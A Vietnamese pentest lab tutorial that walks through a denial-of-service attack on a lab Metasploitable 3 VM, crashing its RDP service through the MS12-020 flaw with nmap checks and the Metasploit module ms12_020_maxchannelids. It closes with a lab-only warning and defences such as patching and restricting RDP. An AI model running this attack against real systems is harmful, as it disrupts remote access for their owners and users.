Pentest Lab : Commando & Metasploitable 3 - Tấn Công DOS MS 12-020

 

Pentest Lab: Tấn Công DOS Lỗ Hổng MS12-020 trên Metasploitable 3 với Commando VM


1. Tổng Quan

  • MS12-020: Một lỗ hổng trong dịch vụ Remote Desktop Protocol (RDP) của Microsoft. Lỗ hổng này cho phép thực thi mã từ xa hoặc tấn công DoS trên các hệ điều hành Windows không được vá lỗi.
  • Metasploitable 3: Máy ảo chứa nhiều lỗ hổng bảo mật để thực hành pentesting.
  • Commando VM: Một môi trường Windows tùy chỉnh dành cho pentesters với nhiều công cụ hỗ trợ.

2. Mục Tiêu Bài Lab

  • Thiết lập môi trường pentest với Commando VM và Metasploitable 3.
  • Tấn công DoS lỗ hổng MS12-020 để làm dịch vụ RDP sập.

3. Thiết Lập Môi Trường

Bước 1: Cài Đặt Metasploitable 3

  1. Tải Metasploitable 3:
  2. Cài đặt Metasploitable 3:
    • Làm theo hướng dẫn trong kho lưu trữ GitHub để xây dựng và chạy máy ảo.
  3. Cấu hình IP:
    • Đặt Metasploitable 3 trên cùng một mạng với Commando VM.

Bước 2: Cài Đặt Commando VM

  1. Cài đặt Commando VM:
  2. Cập nhật công cụ:
    • Mở PowerShell và chạy:
      choco upgrade all
      

4. Thực Hiện Tấn Công DOS

Bước 1: Xác Minh Lỗ Hổng

  1. Quét mạng để tìm Metasploitable 3:

    • Dùng Nmap trên Commando VM:
      nmap -sV -p 3389 
      
    • Xác nhận cổng 3389 (RDP) đang mở.
  2. Kiểm tra lỗ hổng MS12-020:

    • Dùng script của Nmap:
      nmap -p 3389 --script rdp-vuln-ms12-020 
      

Bước 2: Tấn Công với Metasploit

  1. Khởi động Metasploit trên Commando VM:

    msfconsole
    
  2. Tìm module MS12-020:

    search ms12-020
    
  3. Chọn module rdp/ms12_020_maxchannelids:

    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    
  4. Cấu hình mục tiêu:

    set RHOST 
    set RPORT 3389
    
  5. Thực hiện tấn công:

    run
    

Bước 3: Kiểm Tra Kết Quả

  1. Dịch vụ RDP trên Metasploitable 3 sẽ bị crash, không thể kết nối qua cổng 3389.
  2. Kiểm tra log trên Metasploitable 3 để xác nhận dịch vụ RDP đã sập.

5. Lưu Ý và Phòng Chống

Lưu Ý Khi Thực Hiện

  • Không thực hiện trên hệ thống thật: Chỉ thực hành trên môi trường lab.
  • Phục hồi Metasploitable 3: Khởi động lại máy ảo nếu cần.

Cách Phòng Chống

  1. Cập nhật bản vá:
    • Áp dụng bản vá MS12-020 trên hệ thống Windows.
  2. Bảo vệ RDP:
    • Sử dụng VPN hoặc IP Whitelisting để giới hạn truy cập RDP.
  3. Giám sát lưu lượng mạng:
    • Dùng IDS/IPS để phát hiện và ngăn chặn tấn công.

6. Kết Luận

Bài lab này giúp bạn hiểu cách khai thác lỗ hổng MS12-020 để thực hiện tấn công DoS trong môi trường lab. Đồng thời, bạn sẽ học được cách sử dụng NmapMetasploit để xác minh và khai thác lỗ hổng. Đây là một kỹ năng cơ bản quan trọng trong quá trình học pentesting.

Bài viết cùng danh mục